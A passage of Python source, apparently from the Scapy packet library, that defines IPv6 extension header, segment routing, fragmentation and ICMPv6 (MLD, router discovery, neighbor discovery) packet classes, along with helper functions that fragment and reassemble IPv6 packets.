942 _OptionsField("options", [], HBHOptUnknown, 2, 

943 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 

944 overload_fields = {IPv6: {"nh": 60}} 

945 

946 

947# Routing Header # 

948 

949class IPv6ExtHdrRouting(_IPv6ExtHdr): 

950 name = "IPv6 Option Header Routing" 

951 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

952 FieldLenField("len", None, count_of="addresses", fmt="B", 

953 adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501 

954 ByteField("type", 0), 

955 ByteField("segleft", None), 

956 BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501 

957 IP6ListField("addresses", [], 

958 length_from=lambda pkt: 8 * pkt.len)] 

959 overload_fields = {IPv6: {"nh": 43}} 

960 

961 def post_build(self, pkt, pay): 

962 if self.segleft is None: 

963 pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:] 

964 return _IPv6ExtHdr.post_build(self, pkt, pay) 

965 

966 

967# Segment Routing Header # 

968 

969# This implementation is based on RFC8754, but some older snippets come from: 

970# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 

971 

972_segment_routing_header_tlvs = { 

973 # RFC 8754 sect 8.2 

974 0: "Pad1 TLV", 

975 1: "Ingress Node TLV", # draft 06 

976 2: "Egress Node TLV", # draft 06 

977 4: "PadN TLV", 

978 5: "HMAC TLV", 

979} 

980 

981 

982class IPv6ExtHdrSegmentRoutingTLV(Packet): 

983 name = "IPv6 Option Header Segment Routing - Generic TLV" 

984 # RFC 8754 sect 2.1 

985 fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs), 

986 ByteField("len", 0), 

987 StrLenField("value", "", length_from=lambda pkt: pkt.len)] 

988 

989 def extract_padding(self, p): 

990 return b"", p 

991 

992 registered_sr_tlv = {} 

993 

994 @classmethod 

995 def register_variant(cls): 

996 cls.registered_sr_tlv[cls.type.default] = cls 

997 

998 @classmethod 

999 def dispatch_hook(cls, pkt=None, *args, **kargs): 

1000 if pkt: 

1001 tmp_type = ord(pkt[:1]) 

1002 return cls.registered_sr_tlv.get(tmp_type, cls) 

1003 return cls 

1004 

1005 

1006class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV): 

1007 name = "IPv6 Option Header Segment Routing - Ingress Node TLV" 

1008 # draft-ietf-6man-segment-routing-header-06 3.1.1 

1009 fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs), 

1010 ByteField("len", 18), 

1011 ByteField("reserved", 0), 

1012 ByteField("flags", 0), 

1013 IP6Field("ingress_node", "::1")] 

1014 

1015 

1016class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV): 

1017 name = "IPv6 Option Header Segment Routing - Egress Node TLV" 

1018 # draft-ietf-6man-segment-routing-header-06 3.1.2 

1019 fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs), 

1020 ByteField("len", 18), 

1021 ByteField("reserved", 0), 

1022 ByteField("flags", 0), 

1023 IP6Field("egress_node", "::1")] 

1024 

1025 

1026class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV): 

1027 name = "IPv6 Option Header Segment Routing - Pad1 TLV" 

1028 # RFC8754 sect 2.1.1.1 

1029 fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs), 

1030 FieldLenField("len", None, length_of="padding", fmt="B"), 

1031 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 

1032 

1033 

1034class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV): 

1035 name = "IPv6 Option Header Segment Routing - PadN TLV" 

1036 # RFC8754 sect 2.1.1.2 

1037 fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs), 

1038 FieldLenField("len", None, length_of="padding", fmt="B"), 

1039 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 

1040 

1041 

1042class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV): 

1043 name = "IPv6 Option Header Segment Routing - HMAC TLV" 

1044 # RFC8754 sect 2.1.2 

1045 fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs), 

1046 FieldLenField("len", None, length_of="hmac", 

1047 adjust=lambda _, x: x + 48), 

1048 BitField("D", 0, 1), 

1049 BitField("reserved", 0, 15), 

1050 IntField("hmackeyid", 0), 

1051 StrLenField("hmac", "", 

1052 length_from=lambda pkt: pkt.len - 48)] 

1053 

1054 

1055class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr): 

1056 name = "IPv6 Option Header Segment Routing" 

1057 # RFC8754 sect 2. + flag bits from draft 06 

1058 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

1059 ByteField("len", None), 

1060 ByteField("type", 4), 

1061 ByteField("segleft", None), 

1062 ByteField("lastentry", None), 

1063 BitField("unused1", 0, 1), 

1064 BitField("protected", 0, 1), 

1065 BitField("oam", 0, 1), 

1066 BitField("alert", 0, 1), 

1067 BitField("hmac", 0, 1), 

1068 BitField("unused2", 0, 3), 

1069 ShortField("tag", 0), 

1070 IP6ListField("addresses", ["::1"], 

1071 count_from=lambda pkt: (pkt.lastentry + 1)), 

1072 PacketListField("tlv_objects", [], 

1073 IPv6ExtHdrSegmentRoutingTLV, 

1074 length_from=lambda pkt: 8 * pkt.len - 16 * ( 

1075 pkt.lastentry + 1 

1076 ))] 

1077 

1078 overload_fields = {IPv6: {"nh": 43}} 

1079 

1080 def post_build(self, pkt, pay): 

1081 

1082 if self.len is None: 

1083 

1084 # The extension must be align on 8 bytes 

1085 tmp_mod = (-len(pkt) + 8) % 8 

1086 if tmp_mod == 1: 

1087 tlv = IPv6ExtHdrSegmentRoutingTLVPad1() 

1088 pkt += raw(tlv) 

1089 elif tmp_mod >= 2: 

1090 # Add the padding extension 

1091 tmp_pad = b"\x00" * (tmp_mod - 2) 

1092 tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad) 

1093 pkt += raw(tlv) 

1094 

1095 tmp_len = (len(pkt) - 8) // 8 

1096 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:] 

1097 

1098 if self.segleft is None: 

1099 tmp_len = len(self.addresses) 

1100 if tmp_len: 

1101 tmp_len -= 1 

1102 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:] 

1103 

1104 if self.lastentry is None: 

1105 lastentry = len(self.addresses) 

1106 if lastentry == 0: 

1107 warning( 

1108 "IPv6ExtHdrSegmentRouting(): the addresses list is empty!" 

1109 ) 

1110 else: 

1111 lastentry -= 1 

1112 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:] 

1113 

1114 return _IPv6ExtHdr.post_build(self, pkt, pay) 

1115 

1116 

1117# Fragmentation Header # 

1118 

1119class IPv6ExtHdrFragment(_IPv6ExtHdr): 

1120 name = "IPv6 Extension Header - Fragmentation header" 

1121 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

1122 BitField("res1", 0, 8), 

1123 BitField("offset", 0, 13), 

1124 BitField("res2", 0, 2), 

1125 BitField("m", 0, 1), 

1126 IntField("id", None)] 

1127 overload_fields = {IPv6: {"nh": 44}} 

1128 

1129 def guess_payload_class(self, p): 

1130 if self.offset > 0: 

1131 return Raw 

1132 else: 

1133 return super(IPv6ExtHdrFragment, self).guess_payload_class(p) 

1134 

1135 

1136def defragment6(packets): 

1137 """ 

1138 Performs defragmentation of a list of IPv6 packets. Packets are reordered. 

1139 Crap is dropped. What lacks is completed by 'X' characters. 

1140 """ 

1141 

1142 # Remove non fragments 

1143 lst = [x for x in packets if IPv6ExtHdrFragment in x] 

1144 if not lst: 

1145 return [] 

1146 

1147 id = lst[0][IPv6ExtHdrFragment].id 

1148 

1149 llen = len(lst) 

1150 lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id] 

1151 if len(lst) != llen: 

1152 warning("defragment6: some fragmented packets have been removed from list") # noqa: E501 

1153 

1154 # reorder fragments 

1155 res = [] 

1156 while lst: 

1157 min_pos = 0 

1158 min_offset = lst[0][IPv6ExtHdrFragment].offset 

1159 for p in lst: 

1160 cur_offset = p[IPv6ExtHdrFragment].offset 

1161 if cur_offset < min_offset: 

1162 min_pos = 0 

1163 min_offset = cur_offset 

1164 res.append(lst[min_pos]) 

1165 del lst[min_pos] 

1166 

1167 # regenerate the fragmentable part 

1168 fragmentable = b"" 

1169 for p in res: 

1170 q = p[IPv6ExtHdrFragment] 

1171 offset = 8 * q.offset 

1172 if offset != len(fragmentable): 

1173 warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501 

1174 fragmentable += b"X" * (offset - len(fragmentable)) 

1175 fragmentable += raw(q.payload) 

1176 

1177 # Regenerate the unfragmentable part. 

1178 q = res[0].copy() 

1179 nh = q[IPv6ExtHdrFragment].nh 

1180 q[IPv6ExtHdrFragment].underlayer.nh = nh 

1181 q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable) 

1182 del q[IPv6ExtHdrFragment].underlayer.payload 

1183 q /= conf.raw_layer(load=fragmentable) 

1184 del q.plen 

1185 

1186 if q[IPv6].underlayer: 

1187 q[IPv6] = IPv6(raw(q[IPv6])) 

1188 else: 

1189 q = IPv6(raw(q)) 

1190 return q 

1191 

1192 

1193def fragment6(pkt, fragSize): 

1194 """ 

1195 Performs fragmentation of an IPv6 packet. 'fragSize' argument is the 

1196 expected maximum size of fragment data (MTU). The list of packets is 

1197 returned. 

1198 

1199 If packet does not contain an IPv6ExtHdrFragment class, it is added to 

1200 first IPv6 layer found. If no IPv6 layer exists packet is returned in 

1201 result list unmodified. 

1202 """ 

1203 

1204 pkt = pkt.copy() 

1205 

1206 if IPv6ExtHdrFragment not in pkt: 

1207 if IPv6 not in pkt: 

1208 return [pkt] 

1209 

1210 layer3 = pkt[IPv6] 

1211 data = layer3.payload 

1212 frag = IPv6ExtHdrFragment(nh=layer3.nh) 

1213 

1214 layer3.remove_payload() 

1215 del layer3.nh 

1216 del layer3.plen 

1217 

1218 frag.add_payload(data) 

1219 layer3.add_payload(frag) 

1220 

1221 # If the payload is bigger than 65535, a Jumbo payload must be used, as 

1222 # an IPv6 packet can't be bigger than 65535 bytes. 

1223 if len(raw(pkt[IPv6ExtHdrFragment])) > 65535: 

1224 warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501 

1225 return [] 

1226 

1227 s = raw(pkt) # for instantiation to get upper layer checksum right 

1228 

1229 if len(s) <= fragSize: 

1230 return [pkt] 

1231 

1232 # Fragmentable part : fake IPv6 for Fragmentable part length computation 

1233 fragPart = pkt[IPv6ExtHdrFragment].payload 

1234 tmp = raw(IPv6(src="::1", dst="::1") / fragPart) 

1235 fragPartLen = len(tmp) - 40 # basic IPv6 header length 

1236 fragPartStr = s[-fragPartLen:] 

1237 

1238 # Grab Next Header for use in Fragment Header 

1239 nh = pkt[IPv6ExtHdrFragment].nh 

1240 

1241 # Keep fragment header 

1242 fragHeader = pkt[IPv6ExtHdrFragment] 

1243 del fragHeader.payload # detach payload 

1244 

1245 # Unfragmentable Part 

1246 unfragPartLen = len(s) - fragPartLen - 8 

1247 unfragPart = pkt 

1248 del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload 

1249 

1250 # Cut the fragmentable part to fit fragSize. Inner fragments have 

1251 # a length that is an integer multiple of 8 octets. last Frag MTU 

1252 # can be anything below MTU 

1253 lastFragSize = fragSize - unfragPartLen - 8 

1254 innerFragSize = lastFragSize - (lastFragSize % 8) 

1255 

1256 if lastFragSize <= 0 or innerFragSize == 0: 

1257 warning("Provided fragment size value is too low. " + 

1258 "Should be more than %d" % (unfragPartLen + 8)) 

1259 return [unfragPart / fragHeader / fragPart] 

1260 

1261 remain = fragPartStr 

1262 res = [] 

1263 fragOffset = 0 # offset, incremeted during creation 

1264 fragId = random.randint(0, 0xffffffff) # random id ... 

1265 if fragHeader.id is not None: # ... except id provided by user 

1266 fragId = fragHeader.id 

1267 fragHeader.m = 1 

1268 fragHeader.id = fragId 

1269 fragHeader.nh = nh 

1270 

1271 # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... 

1272 while True: 

1273 if (len(remain) > lastFragSize): 

1274 tmp = remain[:innerFragSize] 

1275 remain = remain[innerFragSize:] 

1276 fragHeader.offset = fragOffset # update offset 

1277 fragOffset += (innerFragSize // 8) # compute new one 

1278 if IPv6 in unfragPart: 

1279 unfragPart[IPv6].plen = None 

1280 tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp) 

1281 res.append(tempo) 

1282 else: 

1283 fragHeader.offset = fragOffset # update offSet 

1284 fragHeader.m = 0 

1285 if IPv6 in unfragPart: 

1286 unfragPart[IPv6].plen = None 

1287 tempo = unfragPart / fragHeader / conf.raw_layer(load=remain) 

1288 res.append(tempo) 

1289 break 

1290 return res 

1291 

1292 

1293############################################################################# 

1294############################################################################# 

1295# ICMPv6* Classes # 

1296############################################################################# 

1297############################################################################# 

1298 

1299 

1300icmp6typescls = {1: "ICMPv6DestUnreach", 

1301 2: "ICMPv6PacketTooBig", 

1302 3: "ICMPv6TimeExceeded", 

1303 4: "ICMPv6ParamProblem", 

1304 128: "ICMPv6EchoRequest", 

1305 129: "ICMPv6EchoReply", 

1306 130: "ICMPv6MLQuery", # MLDv1 or MLDv2 

1307 131: "ICMPv6MLReport", 

1308 132: "ICMPv6MLDone", 

1309 133: "ICMPv6ND_RS", 

1310 134: "ICMPv6ND_RA", 

1311 135: "ICMPv6ND_NS", 

1312 136: "ICMPv6ND_NA", 

1313 137: "ICMPv6ND_Redirect", 

1314 # 138: Do Me - RFC 2894 - Seems painful 

1315 139: "ICMPv6NIQuery", 

1316 140: "ICMPv6NIReply", 

1317 141: "ICMPv6ND_INDSol", 

1318 142: "ICMPv6ND_INDAdv", 

1319 143: "ICMPv6MLReport2", 

1320 144: "ICMPv6HAADRequest", 

1321 145: "ICMPv6HAADReply", 

1322 146: "ICMPv6MPSol", 

1323 147: "ICMPv6MPAdv", 

1324 # 148: Do Me - SEND related - RFC 3971 

1325 # 149: Do Me - SEND related - RFC 3971 

1326 151: "ICMPv6MRD_Advertisement", 

1327 152: "ICMPv6MRD_Solicitation", 

1328 153: "ICMPv6MRD_Termination", 

1329 # 154: Do Me - FMIPv6 Messages - RFC 5568 

1330 155: "ICMPv6RPL", # RFC 6550 

1331 } 

1332 

1333icmp6typesminhdrlen = {1: 8, 

1334 2: 8, 

1335 3: 8, 

1336 4: 8, 

1337 128: 8, 

1338 129: 8, 

1339 130: 24, 

1340 131: 24, 

1341 132: 24, 

1342 133: 8, 

1343 134: 16, 

1344 135: 24, 

1345 136: 24, 

1346 137: 40, 

1347 # 139: 

1348 # 140 

1349 141: 8, 

1350 142: 8, 

1351 143: 8, 

1352 144: 8, 

1353 145: 8, 

1354 146: 8, 

1355 147: 8, 

1356 151: 8, 

1357 152: 4, 

1358 153: 4, 

1359 155: 4 

1360 } 

1361 

1362icmp6types = {1: "Destination unreachable", 

1363 2: "Packet too big", 

1364 3: "Time exceeded", 

1365 4: "Parameter problem", 

1366 100: "Private Experimentation", 

1367 101: "Private Experimentation", 

1368 128: "Echo Request", 

1369 129: "Echo Reply", 

1370 130: "MLD Query", 

1371 131: "MLD Report", 

1372 132: "MLD Done", 

1373 133: "Router Solicitation", 

1374 134: "Router Advertisement", 

1375 135: "Neighbor Solicitation", 

1376 136: "Neighbor Advertisement", 

1377 137: "Redirect Message", 

1378 138: "Router Renumbering", 

1379 139: "ICMP Node Information Query", 

1380 140: "ICMP Node Information Response", 

1381 141: "Inverse Neighbor Discovery Solicitation Message", 

1382 142: "Inverse Neighbor Discovery Advertisement Message", 

1383 143: "MLD Report Version 2", 

1384 144: "Home Agent Address Discovery Request Message", 

1385 145: "Home Agent Address Discovery Reply Message", 

1386 146: "Mobile Prefix Solicitation", 

1387 147: "Mobile Prefix Advertisement", 

1388 148: "Certification Path Solicitation", 

1389 149: "Certification Path Advertisement", 

1390 151: "Multicast Router Advertisement", 

1391 152: "Multicast Router Solicitation", 

1392 153: "Multicast Router Termination", 

1393 155: "RPL Control Message", 

1394 200: "Private Experimentation", 

1395 201: "Private Experimentation"} 

1396 

1397 

1398class _ICMPv6(Packet): 

1399 name = "ICMPv6 dummy class" 

1400 overload_fields = {IPv6: {"nh": 58}} 

1401 

1402 def post_build(self, p, pay): 

1403 p += pay 

1404 if self.cksum is None: 

1405 chksum = in6_chksum(58, self.underlayer, p) 

1406 p = p[:2] + struct.pack("!H", chksum) + p[4:] 

1407 return p 

1408 

1409 def hashret(self): 

1410 return self.payload.hashret() 

1411 

1412 def answers(self, other): 

1413 # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ... 

1414 if (isinstance(self.underlayer, IPerror6) or 

1415 isinstance(self.underlayer, _IPv6ExtHdr) and 

1416 isinstance(other, _ICMPv6)): 

1417 if not ((self.type == other.type) and 

1418 (self.code == other.code)): 

1419 return 0 

1420 return 1 

1421 return 0 

1422 

1423 

1424class _ICMPv6Error(_ICMPv6): 

1425 name = "ICMPv6 errors dummy class" 

1426 

1427 def guess_payload_class(self, p): 

1428 return IPerror6 

1429 

1430 

1431class ICMPv6Unknown(_ICMPv6): 

1432 name = "Scapy6 ICMPv6 fallback class" 

1433 fields_desc = [ByteEnumField("type", 1, icmp6types), 

1434 ByteField("code", 0), 

1435 XShortField("cksum", None), 

1436 StrField("msgbody", "")] 

1437 

1438 

1439# RFC 2460 # 

1440 

1441class ICMPv6DestUnreach(_ICMPv6Error): 

1442 name = "ICMPv6 Destination Unreachable" 

1443 fields_desc = [ByteEnumField("type", 1, icmp6types), 

1444 ByteEnumField("code", 0, {0: "No route to destination", 

1445 1: "Communication with destination administratively prohibited", # noqa: E501 

1446 2: "Beyond scope of source address", # noqa: E501 

1447 3: "Address unreachable", 

1448 4: "Port unreachable"}), 

1449 XShortField("cksum", None), 

1450 ByteField("length", 0), 

1451 X3BytesField("unused", 0), 

1452 _ICMPExtensionPadField(), 

1453 _ICMPExtensionField()] 

1454 post_dissection = _ICMP_extpad_post_dissection 

1455 

1456 

1457class ICMPv6PacketTooBig(_ICMPv6Error): 

1458 name = "ICMPv6 Packet Too Big" 

1459 fields_desc = [ByteEnumField("type", 2, icmp6types), 

1460 ByteField("code", 0), 

1461 XShortField("cksum", None), 

1462 IntField("mtu", 1280)] 

1463 

1464 

1465class ICMPv6TimeExceeded(_ICMPv6Error): 

1466 name = "ICMPv6 Time Exceeded" 

1467 fields_desc = [ByteEnumField("type", 3, icmp6types), 

1468 ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501 

1469 1: "fragment reassembly time exceeded"}), # noqa: E501 

1470 XShortField("cksum", None), 

1471 ByteField("length", 0), 

1472 X3BytesField("unused", 0), 

1473 _ICMPExtensionPadField(), 

1474 _ICMPExtensionField()] 

1475 post_dissection = _ICMP_extpad_post_dissection 

1476 

1477 

1478# The default pointer value is set to the next header field of 

1479# the encapsulated IPv6 packet 

1480 

1481 

1482class ICMPv6ParamProblem(_ICMPv6Error): 

1483 name = "ICMPv6 Parameter Problem" 

1484 fields_desc = [ByteEnumField("type", 4, icmp6types), 

1485 ByteEnumField( 

1486 "code", 0, 

1487 {0: "erroneous header field encountered", 

1488 1: "unrecognized Next Header type encountered", 

1489 2: "unrecognized IPv6 option encountered", 

1490 3: "first fragment has incomplete header chain"}), 

1491 XShortField("cksum", None), 

1492 IntField("ptr", 6)] 

1493 

1494 

1495class ICMPv6EchoRequest(_ICMPv6): 

1496 name = "ICMPv6 Echo Request" 

1497 fields_desc = [ByteEnumField("type", 128, icmp6types), 

1498 ByteField("code", 0), 

1499 XShortField("cksum", None), 

1500 XShortField("id", 0), 

1501 XShortField("seq", 0), 

1502 StrField("data", "")] 

1503 

1504 def mysummary(self): 

1505 return self.sprintf("%name% (id: %id% seq: %seq%)") 

1506 

1507 def hashret(self): 

1508 return struct.pack("HH", self.id, self.seq) + self.payload.hashret() 

1509 

1510 

1511class ICMPv6EchoReply(ICMPv6EchoRequest): 

1512 name = "ICMPv6 Echo Reply" 

1513 type = 129 

1514 

1515 def answers(self, other): 

1516 # We could match data content between request and reply. 

1517 return (isinstance(other, ICMPv6EchoRequest) and 

1518 self.id == other.id and self.seq == other.seq and 

1519 self.data == other.data) 

1520 

1521 

1522# ICMPv6 Multicast Listener Discovery (RFC2710) # 

1523 

1524# tous les messages MLD sont emis avec une adresse source lien-locale 

1525# -> Y veiller dans le post_build si aucune n'est specifiee 

1526# La valeur de Hop-Limit doit etre de 1 

1527# "and an IPv6 Router Alert option in a Hop-by-Hop Options 

1528# header. (The router alert option is necessary to cause routers to 

1529# examine MLD messages sent to multicast addresses in which the router 

1530# itself has no interest" 

1531class _ICMPv6ML(_ICMPv6): 

1532 fields_desc = [ByteEnumField("type", 130, icmp6types), 

1533 ByteField("code", 0), 

1534 XShortField("cksum", None), 

1535 ShortField("mrd", 0), 

1536 ShortField("reserved", 0), 

1537 IP6Field("mladdr", "::")] 

1538 

1539# general queries are sent to the link-scope all-nodes multicast 

1540# address ff02::1, with a multicast address field of 0 and a MRD of 

1541# [Query Response Interval] 

1542# Default value for mladdr is set to 0 for a General Query, and 

1543# overloaded by the user for a Multicast Address specific query 

1544# TODO : See what we can do to automatically include a Router Alert 

1545# Option in a Destination Option Header. 

1546 

1547 

1548class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710 

1549 name = "MLD - Multicast Listener Query" 

1550 type = 130 

1551 mrd = 10000 # 10s for mrd 

1552 mladdr = "::" 

1553 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} 

1554 

1555 

1556# TODO : See what we can do to automatically include a Router Alert 

1557# Option in a Destination Option Header. 

1558class ICMPv6MLReport(_ICMPv6ML): # RFC 2710 

1559 name = "MLD - Multicast Listener Report" 

1560 type = 131 

1561 overload_fields = {IPv6: {"hlim": 1, "nh": 58}} 

1562 

1563 def answers(self, query): 

1564 """Check the query type""" 

1565 return ICMPv6MLQuery in query 

1566 

1567# When a node ceases to listen to a multicast address on an interface, 

1568# it SHOULD send a single Done message to the link-scope all-routers 

1569# multicast address (FF02::2), carrying in its multicast address field 

1570# the address to which it is ceasing to listen 

1571# TODO : See what we can do to automatically include a Router Alert 

1572# Option in a Destination Option Header. 

1573 

1574 

1575class ICMPv6MLDone(_ICMPv6ML): # RFC 2710 

1576 name = "MLD - Multicast Listener Done" 

1577 type = 132 

1578 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}} 

1579 

1580 

1581# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) # 

1582 

1583class ICMPv6MLQuery2(_ICMPv6): # RFC 3810 

1584 name = "MLDv2 - Multicast Listener Query" 

1585 fields_desc = [ByteEnumField("type", 130, icmp6types), 

1586 ByteField("code", 0), 

1587 XShortField("cksum", None), 

1588 ShortField("mrd", 10000), 

1589 ShortField("reserved", 0), 

1590 IP6Field("mladdr", "::"), 

1591 BitField("Resv", 0, 4), 

1592 BitField("S", 0, 1), 

1593 BitField("QRV", 0, 3), 

1594 ByteField("QQIC", 0), 

1595 ShortField("sources_number", None), 

1596 IP6ListField("sources", [], 

1597 count_from=lambda pkt: pkt.sources_number)] 

1598 

1599 # RFC8810 - 4. Message Formats 

1600 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} 

1601 

1602 def post_build(self, packet, payload): 

1603 """Compute the 'sources_number' field when needed""" 

1604 if self.sources_number is None: 

1605 srcnum = struct.pack("!H", len(self.sources)) 

1606 packet = packet[:26] + srcnum + packet[28:] 

1607 return _ICMPv6.post_build(self, packet, payload) 

1608 

1609 

1610class ICMPv6MLDMultAddrRec(Packet): 

1611 name = "ICMPv6 MLDv2 - Multicast Address Record" 

1612 fields_desc = [ByteField("rtype", 4), 

1613 FieldLenField("auxdata_len", None, 

1614 length_of="auxdata", 

1615 fmt="B"), 

1616 FieldLenField("sources_number", None, 

1617 length_of="sources", 

1618 adjust=lambda p, num: num // 16), 

1619 IP6Field("dst", "::"), 

1620 IP6ListField("sources", [], 

1621 length_from=lambda p: 16 * p.sources_number), 

1622 StrLenField("auxdata", "", 

1623 length_from=lambda p: p.auxdata_len)] 

1624 

1625 def default_payload_class(self, packet): 

1626 """Multicast Address Record followed by another one""" 

1627 return self.__class__ 

1628 

1629 

1630class ICMPv6MLReport2(_ICMPv6): # RFC 3810 

1631 name = "MLDv2 - Multicast Listener Report" 

1632 fields_desc = [ByteEnumField("type", 143, icmp6types), 

1633 ByteField("res", 0), 

1634 XShortField("cksum", None), 

1635 ShortField("reserved", 0), 

1636 ShortField("records_number", None), 

1637 PacketListField("records", [], 

1638 ICMPv6MLDMultAddrRec, 

1639 count_from=lambda p: p.records_number)] 

1640 

1641 # RFC8810 - 4. Message Formats 

1642 overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}} 

1643 

1644 def post_build(self, packet, payload): 

1645 """Compute the 'records_number' field when needed""" 

1646 if self.records_number is None: 

1647 recnum = struct.pack("!H", len(self.records)) 

1648 packet = packet[:6] + recnum + packet[8:] 

1649 return _ICMPv6.post_build(self, packet, payload) 

1650 

1651 def answers(self, query): 

1652 """Check the query type""" 

1653 return isinstance(query, ICMPv6MLQuery2) 

1654 

1655 

1656# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) # 

1657 

1658# TODO: 

1659# - 04/09/06 troglocan : find a way to automatically add a router alert 

1660# option for all MRD packets. This could be done in a specific 

1661# way when IPv6 is the under layer with some specific keyword 

1662# like 'exthdr'. This would allow to keep compatibility with 

1663# providing IPv6 fields to be overloaded in fields_desc. 

1664# 

1665# At the moment, if user inserts an IPv6 Router alert option 

1666# none of the IPv6 default values of IPv6 layer will be set. 

1667 

1668class ICMPv6MRD_Advertisement(_ICMPv6): 

1669 name = "ICMPv6 Multicast Router Discovery Advertisement" 

1670 fields_desc = [ByteEnumField("type", 151, icmp6types), 

1671 ByteField("advinter", 20), 

1672 XShortField("cksum", None), 

1673 ShortField("queryint", 0), 

1674 ShortField("robustness", 0)] 

1675 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} 

1676 # IPv6 Router Alert requires manual inclusion 

1677 

1678 def extract_padding(self, s): 

1679 return s[:8], s[8:] 

1680 

1681 

1682class ICMPv6MRD_Solicitation(_ICMPv6): 

1683 name = "ICMPv6 Multicast Router Discovery Solicitation" 

1684 fields_desc = [ByteEnumField("type", 152, icmp6types), 

1685 ByteField("res", 0), 

1686 XShortField("cksum", None)] 

1687 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} 

1688 # IPv6 Router Alert requires manual inclusion 

1689 

1690 def extract_padding(self, s): 

1691 return s[:4], s[4:] 

1692 

1693 

1694class ICMPv6MRD_Termination(_ICMPv6): 

1695 name = "ICMPv6 Multicast Router Discovery Termination" 

1696 fields_desc = [ByteEnumField("type", 153, icmp6types), 

1697 ByteField("res", 0), 

1698 XShortField("cksum", None)] 

1699 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}} 

1700 # IPv6 Router Alert requires manual inclusion 

1701 

1702 def extract_padding(self, s): 

1703 return s[:4], s[4:] 

1704 

1705 

1706# ICMPv6 Neighbor Discovery (RFC 2461) # 

1707 

1708icmp6ndopts = {1: "Source Link-Layer Address", 

1709 2: "Target Link-Layer Address", 

1710 3: "Prefix Information", 

1711 4: "Redirected Header", 

1712 5: "MTU", 

1713 6: "NBMA Shortcut Limit Option", # RFC2491 

1714 7: "Advertisement Interval Option", 

1715 8: "Home Agent Information Option", 

1716 9: "Source Address List", 

1717 10: "Target Address List", 

1718 11: "CGA Option", # RFC 3971 

1719 12: "RSA Signature Option", # RFC 3971 

1720 13: "Timestamp Option", # RFC 3971 

1721 14: "Nonce option", # RFC 3971 

1722 15: "Trust Anchor Option", # RFC 3971 

1723 16: "Certificate Option", # RFC 3971 

1724 17: "IP Address Option", # RFC 4068 

1725 18: "New Router Prefix Information Option", # RFC 4068 

1726 19: "Link-layer Address Option", # RFC 4068 

1727 20: "Neighbor Advertisement Acknowledgement Option", 

1728 21: "CARD Request Option", # RFC 4065/4066/4067 

1729 22: "CARD Reply Option", # RFC 4065/4066/4067 

1730 23: "MAP Option", # RFC 4140 

1731 24: "Route Information Option", # RFC 4191 

1732 25: "Recursive DNS Server Option", 

1733 26: "IPv6 Router Advertisement Flags Option" 

1734 } 

1735 

1736icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr", 

1737 2: "ICMPv6NDOptDstLLAddr", 

1738 3: "ICMPv6NDOptPrefixInfo", 

1739 4: "ICMPv6NDOptRedirectedHdr", 

1740 5: "ICMPv6NDOptMTU", 

1741 6: "ICMPv6NDOptShortcutLimit", 

1742 7: "ICMPv6NDOptAdvInterval", 

1743 8: "ICMPv6NDOptHAInfo", 

1744 9: "ICMPv6NDOptSrcAddrList", 

1745 10: "ICMPv6NDOptTgtAddrList", 

1746 # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py 

1747 # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py 

1748 # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py 

1749 # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py 

1750 # 15: Do Me, 

1751 # 16: Do Me, 

1752 17: "ICMPv6NDOptIPAddr", 

1753 18: "ICMPv6NDOptNewRtrPrefix", 

1754 19: "ICMPv6NDOptLLA", 

1755 # 18: Do Me, 

1756 # 19: Do Me, 

1757 # 20: Do Me, 

